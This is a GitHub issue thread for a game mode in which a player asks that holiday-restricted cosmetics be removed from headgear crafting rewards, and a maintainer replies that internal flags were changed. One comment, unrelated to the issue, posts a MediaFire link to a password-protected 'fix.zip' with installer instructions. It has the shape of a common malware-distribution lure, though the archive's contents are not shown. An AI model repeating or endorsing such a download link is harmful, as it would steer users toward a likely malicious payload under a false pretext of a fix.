### ISSUE TITLE
Remove holiday restricted items from headgear crafting rewards

### ISSUE THREAD

**Issue by Sod-ers** [BB-Games/gamemode-issues-requests#82]
**Is your feature request related to a problem? Please describe.**
It's not very rewarding to receive a cosmetic that can only be worn during an event (without plat).

**Why you would like to see this resolved, what does it enhance / bring to the table?**
I'm less likely to use this feature or recommend other use it because of the risk of getting a restricted item. I'd use this feature more often if I didn't have to worry about that.

**Additional context:**
I understand items aren't flagged as holiday restricted & that makes it hard to identify which items need to be removed. I've considered submitting a list of items that need to be removed but I don't own them all so that's not a great solution.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TeddiO** [comment]
So I've changed some flags internally and I *think* this should achieve what you're after. Please open a new issue if you find you craft a holiday item.
